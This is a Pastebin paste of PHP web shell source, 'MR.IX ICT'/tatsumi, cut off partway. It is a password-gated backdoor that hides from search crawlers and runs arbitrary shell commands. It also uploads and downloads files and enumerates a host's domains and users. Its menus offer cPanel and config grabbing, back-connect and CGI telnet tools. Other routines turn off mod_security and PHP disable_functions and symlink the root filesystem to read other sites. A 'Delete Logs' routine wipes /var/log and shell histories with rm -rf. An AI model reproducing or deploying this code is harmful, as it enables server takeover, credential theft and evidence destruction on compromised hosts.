SHARE
TWEET

Untitled

a guest Aug 18th, 2018 397 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "bb8f921d8a073755f716184269791b4d"; // default: tatsumi2k17
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>MR.IX ICT</title>
  31. <style type="text/css">
  32. html {
  33.     margin: 20px auto;
  34.     background: #000000;
  35.     color: green;
  36.     text-align: center;
  37. }
  38. header {
  39.     color: green;
  40.     margin: 10px auto;
  41. }
  42. input[type=password] {
  43.     width: 250px;
  44.     height: 25px;
  45.     color: red;
  46.     background: #000000;
  47.     border: 1px dotted green;
  48.     padding: 5px;
  49.     margin-left: 20px;
  50.     text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center>
  55. <header>
  56.     <pre>
  57.   __  __  _____      _____ __   __
  58.  |  \/  ||  __ \    |_   _|\ \ / /
  59.  | \  / || |__) |     | |   \ V /
  60.  | |\/| ||  _  /      | |    > <  
  61.  | |  | || | \ \  _  _| |_  / . \
  62.  |_|  |_||_|  \_\(_)|_____|/_/ \_\
  63.                                  
  64.                                  
  65.     </pre>
  66. </header>
  67. <form method="post">
  68. <input type="password" name="pass">
  69. </form>
  70. <?php
  71. exit;
  72. }
  73. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  74.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  75.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  76.     else
  77.         login_shell();
  78. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  79.     @ob_clean();
  80.     $file = $_GET['file'];
  81.     header('Content-Description: File Transfer');
  82.     header('Content-Type: application/octet-stream');
  83.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  84.     header('Expires: 0');
  85.     header('Cache-Control: must-revalidate');
  86.     header('Pragma: public');
  87.     header('Content-Length: ' . filesize($file));
  88.     readfile($file);
  89.     exit;
  90. }
  91. ?>
  92. <!DOCTYPE HTML>
  93. <HTML>
  94. <HEAD>
  95. <link href="" rel="stylesheet" type="text/css">
  96. <title>MR.IX ICT</title>
  97.   <meta charset="utf-8">
  98.   <meta name="viewport" content="width=device-width, initial-scale=1">
  99.   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  100.   <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  101.   <style>
  102.         body {
  103.   background: url(https://pbs.twimg.com/media/DBMqSeWXcAE1m8X.jpg:large) no-repeat center center fixed;
  104.   -webkit-background-size: cover;
  105.   -moz-background-size: cover;
  106.   -o-background-size: cover;
  107.   background-size: cover;
  108.   color: white;
  109. }
  110. .twitter a{
  111.   text-decoration: none;
  112.   font-family: Arial, sans-serif  ;
  113.   font-size: 50px;
  114.   text-shadow: grey 0px 0px 10px;
  115. }
  116.  
  117.  
  118. }
  119.     <body background="https://cdn.pixabay.com/photo/2016/04/15/04/02/water-1330252_960_720.jpg">
  120. @font-face {
  121.     font-family: 'ubuntu_monoregular';
  122. src: url(data:application/x-font-woff;charset=utf-8;base64,) format('woff');
  123.     font-weight: normal;
  124.     font-style: normal;
  125.  
  126. }
  127.  
  128.  
  129.  
  130. option{
  131. background:#000;color:white;border:0;}
  132. }
  133. .table_home, .td_home {
  134.     border: 1px solid #191919;
  135. }
  136. .table_home td:hover {
  137.     background: #191919;
  138. }
  139. .th_home {
  140.     font-family:ubuntu_monoregular;
  141.      font-size: 12px;
  142.      background:#191919;
  143.      color:white;
  144.      border-color: #191919;
  145.      text-decoration:none;
  146.      letter-spacing:2px;
  147. }
  148. th {
  149.     padding: 10px;
  150. }
  151. a {
  152.     color: #ffffff;
  153.     text-decoration: none;
  154. }
  155. a:hover {
  156.     color: white;
  157.     text-decoration: underline;
  158.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  159.  
  160. }
  161. b {
  162.     color: white;
  163. }
  164. input[type=text], input[type=password],input[type=submit] {
  165.     background: transparent;
  166.     color:white;
  167.     margin:0 10px;
  168.     font-family:Homenaje;
  169.     font-size:13px;
  170.     border:2px solid #2d2b2b;
  171. }
  172. input[type=submit] {
  173.     background: transparent;
  174.     color:white;
  175.     margin:0 10px;
  176.     font-family:Homenaje;
  177.     font-size:13px;
  178.     border:2px solid #2d2b2b;
  179.  
  180. }
  181. option:hover {
  182. background:#000;color:white;border:0;}
  183.  
  184. }.a_exp{border:1px solid #fff;border-collapse: collapse;
  185. }
  186. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  187. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  188. .infoweb {
  189.     border-right: 1px solid #00FFFF;
  190. }
  191.     </style>
  192. </head>
  193.  
  194. <?php
  195. function w($dir,$perm) {
  196.     if(!is_writable($dir)) {
  197.         return "<font color=red>".$perm."</font>";
  198.     } else {
  199.         return "<font color=green>".$perm."</font>";
  200.     }
  201. }
  202. function exe($cmd) {
  203.     if(function_exists('system')) {        
  204.         @ob_start();       
  205.         @system($cmd);     
  206.         $buff = @ob_get_contents();        
  207.         @ob_end_clean();       
  208.         return $buff;  
  209.     } elseif(function_exists('exec')) {        
  210.         @exec($cmd,$results);      
  211.         $buff = "";        
  212.         foreach($results as $result) {         
  213.             $buff .= $result;      
  214.         } return $buff;    
  215.     } elseif(function_exists('passthru')) {        
  216.         @ob_start();       
  217.         @passthru($cmd);       
  218.         $buff = @ob_get_contents();        
  219.         @ob_end_clean();       
  220.         return $buff;  
  221.     } elseif(function_exists('shell_exec')) {      
  222.         $buff = @shell_exec($cmd);     
  223.         return $buff;  
  224.     }
  225. }
  226. function sulap($text) {
  227.   if(!get_magic_quotes_gpc()) {
  228.     return $text;
  229.     }
  230.   return stripslashes($text);
  231. }
  232. function GrabUrl($url,$type){
  233.  
  234.         $urlArray = array();
  235.  
  236.         $ch = curl_init();
  237.         curl_setopt($ch, CURLOPT_URL, $url);
  238.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  239.         $result = curl_exec($ch);
  240.  
  241.         $regex='|<a.*?href="(.*?)"|';
  242.         preg_match_all($regex,$result,$parts);
  243.         $links=$parts[1];
  244.         foreach($links as $link){
  245.             array_push($urlArray, $link);
  246.         }
  247.         curl_close($ch);
  248.  
  249.         foreach($urlArray as $value){
  250.             $lol="$url$value";
  251.             if(preg_match("#$type#is", $lol)) {
  252.                 echo "$lol\r\n";
  253.             }
  254.         }
  255. }
  256. function showdisablefunctions() {
  257.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  258.     else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  259. }
  260. function ambilKata($param, $kata1, $kata2){
  261.     if(strpos($param, $kata1) === FALSE) return FALSE;
  262.     if(strpos($param, $kata2) === FALSE) return FALSE;
  263.     $start = strpos($param, $kata1) + strlen($kata1);
  264.     $end = strpos($param, $kata2, $start);
  265.     $return = substr($param, $start, $end - $start);
  266.     return $return;
  267. }
  268. function perms($file){
  269. $perms = fileperms($file);
  270. if (($perms & 0xC000) == 0xC000) {
  271. // Socket
  272. $info = 's';
  273. } elseif (($perms & 0xA000) == 0xA000) {
  274. // Symbolic Link
  275. $info = 'l';
  276. } elseif (($perms & 0x8000) == 0x8000) {
  277. // Regular
  278. $info = '-';
  279. } elseif (($perms & 0x6000) == 0x6000) {
  280. // Block special
  281. $info = 'b';
  282. } elseif (($perms & 0x4000) == 0x4000) {
  283. // Directory
  284. $info = 'd';
  285. } elseif (($perms & 0x2000) == 0x2000) {
  286. // Character special
  287. $info = 'c';
  288. } elseif (($perms & 0x1000) == 0x1000) {
  289. // FIFO pipe
  290. $info = 'p';
  291. } else {
  292. // Unknown
  293. $info = 'u';
  294. }
  295.  
  296. // Owner
  297. $info .= (($perms & 0x0100) ? 'r' : '-');
  298. $info .= (($perms & 0x0080) ? 'w' : '-');
  299. $info .= (($perms & 0x0040) ?
  300. (($perms & 0x0800) ? 's' : 'x' ) :
  301. (($perms & 0x0800) ? 'S' : '-'));
  302.  
  303. // Group
  304. $info .= (($perms & 0x0020) ? 'r' : '-');
  305. $info .= (($perms & 0x0010) ? 'w' : '-');
  306. $info .= (($perms & 0x0008) ?
  307. (($perms & 0x0400) ? 's' : 'x' ) :
  308. (($perms & 0x0400) ? 'S' : '-'));
  309.  
  310. // World
  311. $info .= (($perms & 0x0004) ? 'r' : '-');
  312. $info .= (($perms & 0x0002) ? 'w' : '-');
  313. $info .= (($perms & 0x0001) ?
  314. (($perms & 0x0200) ? 't' : 'x' ) :
  315. (($perms & 0x0200) ? 'T' : '-'));
  316.  
  317. return $info;
  318. }
  319. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  320. $sys = php_uname();
  321. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  322. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  323. $getds = @ini_get("disable_functions");
  324. $ds = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
  325. if(isset($_GET['path'])){
  326. $path = $_GET['path'];
  327. }else{
  328. $path = getcwd();
  329. }
  330. $path = str_replace('\\','/',$path);
  331. $paths = explode('/',$path);
  332. $home_r = $_SERVER['DOCUMENT_ROOT'];
  333. if(get_magic_quotes_gpc()){
  334. foreach($_POST as $key=>$value){
  335. $_POST[$key] = stripslashes($value);
  336. }
  337. }
  338. if($_POST['upload']) {
  339.         if($_POST['tipe_upload'] == 'biasa') {
  340.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  341.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  342.             } else {
  343.                 $act = "<font color=red>Failed to upload file</font>";
  344.             }
  345.         } else {
  346.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  347.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  348.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  349.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  350.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  351.                 } else {
  352.                     $act = "<font color=red>Failed to upload file</font>";
  353.                 }
  354.             } else {
  355.                 $act = "<font color=red>Failed to upload file</font>";
  356.             }
  357.         }
  358.    
  359.     }
  360. echo '</br>
  361. System : '.$sys.'<br>
  362. IP : '.$ip.'<br>
  363. Safe Mode : '.$sm.'<br>
  364. Disabled Functions : '.$ds.'<br>
  365. </center>
  366. </td></tr>
  367. </table>';
  368.     foreach($paths as $id=>$pat){
  369. if($pat == '' && $id == 0){
  370. $a = true;
  371. echo '<a href="?path=/">/</a>';
  372. continue;
  373. }
  374. if($pat == '') continue;
  375. echo '<a href="?path=';
  376. for($i=0;$i<=$id;$i++){
  377. echo "$paths[$i]";
  378. if($i != $id) echo "/";
  379. }
  380. echo '">'.$pat.'</a>/';
  381. }
  382.     echo "<center>
  383.     <form method='post' enctype='multipart/form-data'>
  384.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  385.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  386.     </br>
  387.     <input type='file' name='ix_file'>
  388.     <input type='submit' value='upload' name='upload'>
  389.     </form>";
  390.     echo $act;
  391.  
  392. echo"
  393. <div id='menu'>
  394. <center>
  395. <ul>
  396. <a href='?'><b>Home</b></a>
  397. <a href='?path=$path&jancok=cmd'>Command</a>
  398. <a href='?path=$path&jancok=mass'>Mass</a>
  399. <a href='?path=$path&jancok=adminer'>Adminer</a>
  400. <a href='?path=$path&jancok=jumping'>Jumping</a>
  401. <a href='?path=$path&jancok=cpanel'>Grab Cpanel</a></div></br>
  402. <a href='?path=$path&jancok=cgi'>Cgi Telnet</a>
  403. <a href='?path=$path&config=grabber'>Config V1</a>
  404. <a href='?path=$path&mass=changer'>Mass User Changer</a>
  405. <a href='?path=$path&backconnect=tool'>Back Connect Tools</a>
  406. <a href='?path=$path&symlink=tool'>Symlink Tools</a>
  407. <a href='?path=$path&bypass=tool'>Bypass Tools</a>
  408. <a href='?path=$path&jancok=logout'><b>Log-Out</b></a></div></ul></div></center>";
  409. echo '</td></tr>';
  410. echo '</table>';
  411.  
  412. if($_GET['jancok'] == 'logout') {
  413. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  414.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  415.     echo 'Good Bye!!';
  416. } elseif($_GET['tatsumi'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  417. }elseif($_GET['tatsumi'] == 'info') {
  418. } elseif($_GET['delete'] == 'logs') {
  419.     echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
  420.     echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";      
  421.     exec("rm -rf /tmp/logs");
  422.     exec("rm -rf /root/.ksh_history");
  423.     exec("rm -rf /root/.bash_history");
  424.     exec("rm -rf /root/.bash_logout");
  425.     exec("rm -rf /usr/local/apache/logs");
  426.     exec("rm -rf /usr/local/apache/log");
  427.     exec("rm -rf /var/apache/logs");
  428.     exec("rm -rf /var/apache/log");
  429.     exec("rm -rf /var/run/utmp");
  430.     exec("rm -rf /var/logs");
  431.     exec("rm -rf /var/log");
  432.     exec("rm -rf /var/adm");
  433.     exec("rm -rf /etc/wtmp");
  434.     exec("rm -rf /etc/utmp");
  435.     exec("rm -rf $HISTFILE");
  436.     exec("rm -rf /var/log/lastlog");
  437.     exec("rm -rf /var/log/wtmp");
  438.  
  439.     shell_exec("rm -rf /tmp/logs");
  440.     shell_exec("rm -rf /root/.ksh_history");
  441.     shell_exec("rm -rf /root/.bash_history");
  442.     shell_exec("rm -rf /root/.bash_logout");
  443.     shell_exec("rm -rf /usr/local/apache/logs");
  444.     shell_exec("rm -rf /usr/local/apache/log");
  445.     shell_exec("rm -rf /var/apache/logs");
  446.     shell_exec("rm -rf /var/apache/log");
  447.     shell_exec("rm -rf /var/run/utmp");
  448.     shell_exec("rm -rf /var/logs");
  449.     shell_exec("rm -rf /var/log");
  450.     shell_exec("rm -rf /var/adm");
  451.     shell_exec("rm -rf /etc/wtmp");
  452.     shell_exec("rm -rf /etc/utmp");
  453.     shell_exec("rm -rf $HISTFILE");
  454.     shell_exec("rm -rf /var/log/lastlog");
  455.     shell_exec("rm -rf /var/log/wtmp");
  456.  
  457.     passthru("rm -rf /tmp/logs");
  458.     passthru("rm -rf /root/.ksh_history");
  459.     passthru("rm -rf /root/.bash_history");
  460.     passthru("rm -rf /root/.bash_logout");
  461.     passthru("rm -rf /usr/local/apache/logs");
  462.     passthru("rm -rf /usr/local/apache/log");
  463.     passthru("rm -rf /var/apache/logs");
  464.     passthru("rm -rf /var/apache/log");
  465.     passthru("rm -rf /var/run/utmp");
  466.     passthru("rm -rf /var/logs");
  467.     passthru("rm -rf /var/log");
  468.     passthru("rm -rf /var/adm");
  469.     passthru("rm -rf /etc/wtmp");
  470.     passthru("rm -rf /etc/utmp");
  471.     passthru("rm -rf $HISTFILE");
  472.     passthru("rm -rf /var/log/lastlog");
  473.     passthru("rm -rf /var/log/wtmp");
  474.  
  475.  
  476.     system("rm -rf /tmp/logs");
  477.     sleep(2);
  478.     echo'<br>Deleting .../tmp/logs ';
  479.     sleep(2);
  480.  
  481.     system("rm -rf /root/.bash_history");
  482.     sleep(2);
  483.     echo'<p>Deleting .../root/.bash_history </p>';
  484.  
  485.     system("rm -rf /root/.ksh_history");
  486.     sleep(2);
  487.     echo'<p>Deleting .../root/.ksh_history </p>';
  488.  
  489.     system("rm -rf /root/.bash_logout");
  490.     sleep(2);
  491.     echo'<p>Deleting .../root/.bash_logout </p>';
  492.  
  493.     system("rm -rf /usr/local/apache/logs");
  494.     sleep(2);
  495.     echo'<p>Deleting .../usr/local/apache/logs </p>';
  496.  
  497.     system("rm -rf /usr/local/apache/log");
  498.     sleep(2);
  499.     echo'<p>Deleting .../usr/local/apache/log </p>';
  500.  
  501.     system("rm -rf /var/apache/logs");
  502.     sleep(2);
  503.     echo'<p>Deleting .../var/apache/logs </p>';
  504.  
  505.     system("rm -rf /var/apache/log");
  506.     sleep(2);
  507.     echo'<p>Deleting .../var/apache/log </p>';
  508.  
  509.     system("rm -rf /var/run/utmp");
  510.     sleep(2);
  511.     echo'<p>Deleting .../var/run/utmp </p>';
  512.  
  513.     system("rm -rf /var/logs");
  514.     sleep(2);
  515.     echo'<p>Deleting .../var/logs </p>';
  516.  
  517.     system("rm -rf /var/log");
  518.     sleep(2);
  519.     echo'<p>Deleting .../var/log </p>';
  520.  
  521.     system("rm -rf /var/adm");
  522.     sleep(2);
  523.     echo'<p>Deleting .../var/adm </p>';
  524.  
  525.     system("rm -rf /etc/wtmp");
  526.     sleep(2);
  527.     echo'<p>Deleting .../etc/wtmp </p>';
  528.  
  529.     system("rm -rf /etc/utmp");
  530.     sleep(2);
  531.     echo'<p>Deleting .../etc/utmp </p>';
  532.  
  533.     system("rm -rf $HISTFILE");
  534.     sleep(2);
  535.     echo'<p>Deleting ...$HISTFILE </p>';
  536.  
  537.     system("rm -rf /var/log/lastlog");
  538.     sleep(2);
  539.     echo'<p>Deleting .../var/log/lastlog </p>';
  540.  
  541.     system("rm -rf /var/log/wtmp");
  542.     sleep(2);
  543.     echo'<p>Deleting .../var/log/wtmp </p>';
  544.  
  545.     sleep(4);
  546.  
  547.     echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
  548.     echo"</td></tr></table>";
  549. } elseif($_GET['bypass'] == 'vhosts') {
  550.         echo "<div id='menu'><center></br><a href='?path=$path&bypass=disablefunc'>Disable Functions</a></br><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a></br><a href='?path=$path&bypass=vhostss'>Bypass Vhosts</a></br></div>";
  551.     echo "<form method='POST' action=''>";
  552.     echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  553.     echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  554.         if (isset($_POST['Colii'])){
  555.                         mkdir('symvhosts', 0755);
  556.                         chdir('symvhosts');
  557.                         system('ln -s / tatsumi.txt');
  558.             $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  559.             $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","tatsumi.txt");
  560.             $rt="<br><a href=symvhosts/tatsumi.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  561.     Bypassed Successfully</b></font></a>";
  562.     echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
  563. } elseif($_GET['jancok'] == 'cgi') {
  564.     $cgi_dir = mkdir('tatsumi_cgi', 0755);
  565.         chdir('tatsumi_cgi');
  566.     $file_cgi = "cgi.tatsumi";
  567.         $memeg = ".htaccess";
  568.     $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .tatsumi \n AddHandler cgi-script .tatsumi \n AddHandler cgi-script .tatsumi";
  569.     $htcgi = fopen(".htaccess", "w");
  570.     $cgi_script = "";
  571.     $cgi = fopen($file_cgi, "w");
  572.     fwrite($cgi, base64_decode($cgi_script));
  573.     fwrite($htcgi, $isi_htcgi);
  574.     chmod($file_cgi, 0755);
  575.         chmod($memeg, 0755);
  576.     echo "<br><center>Done ... <a href='tatsumi_cgi/cgi.tatsumi' target='_blank'>Klik Here</a>";
  577. }elseif($_GET['symlink'] == 'python') {
  578.     $sym_dir = mkdir('tatsumi_sympy', 0755);
  579.         chdir('tatsumi_sympy');
  580.     $file_sym = "sym.py";
  581.     $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
  582.         $sym = fopen($file_sym, "w");
  583.     fwrite($sym, base64_decode($sym_script));
  584.     chmod($file_sym, 0755);
  585.         $jancok = exe("python sym.py");
  586.    
  587.         echo "<div id='menu'><center></br><a href='?path=$path&symlink=server'>Symlink Server </a></br><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  588.     echo "<br><center>Done ... <a href='tatsumi_sympy/brudulsympy/' target='_blank'>Klik Here</a>";
  589. } elseif($_GET['bypass'] == 'disablefunc'){
  590.                 echo "<div id='menu'><center></br><a href='?path=$path&bypass=disablefunc'>Disable Functions</a></br><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a></br><a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a></div>";
  591.         echo "<br><br><center>";
  592.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' />&nbsp;<input type=submit name=litini value='Litespeed' /></form>";
  593.         if(isset($_POST['ini']))
  594. {
  595.         $file = fopen("php.ini","w");
  596.         echo fwrite($file,"disable_functions=none
  597. safe_mode = Off
  598.     ");
  599.         fclose($file);
  600.         echo "<a href='php.ini'>click here!</a>";
  601. }       if(isset($_POST['htce']))
  602. {
  603.         $file = fopen(".htaccess","w");
  604.         echo fwrite($file,"<IfModule mod_security.c>
  605. SecFilterEngine Off
  606. SecFilterScanPOST Off
  607. </IfModule>
  608.     ");
  609.         fclose($file);
  610.         echo "htaccess successfully created!";
  611. }               if(isset($_POST['litini'])){
  612.         $iniph = '<? n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["file"]); n ini_restore("safe_mode"); n ini_restore("open_basedir"); n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["ss"]; n ?>';
  613.              $byph = "safe_mode = Off n disable_functions= ";
  614.         $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
  615.         file_put_contents("php.ini",base64_decode($byph));
  616.         file_put_contents("ini.php",base64_decode($iniph));
  617.         file_put_contents(".htaccess",base64_decode($comp));
  618.         echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
  619.         echo"</center>";
  620. }
  621. }elseif($_GET['bypass'] == 'tool'){
  622. echo "<div id='menu'><center>";
  623. echo "</br><a href='?path=$path&bypass=disablefunc'>Disable Functions</a></br><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a></br><a href='?path=$path&bypass=vhosts'>Bypass Vhosts</a></div>";
  624. } elseif($_GET['symlink'] == 'tool'){
  625. echo "<div id='menu'><center>";
  626. echo "</br></br><a href='?path=$path&symlink=server'>Symlink Server </a></br><a href='?path=$path&symlink=404'>Symlink 404</a></br><a href='?path=$path&symlink=python'>Bypass Symlink Python</a></div>";
  627. } elseif ($_GET['symlink'] == '404'){
  628. @error_reporting(0);
  629. @ini_set('display_errors', 0);
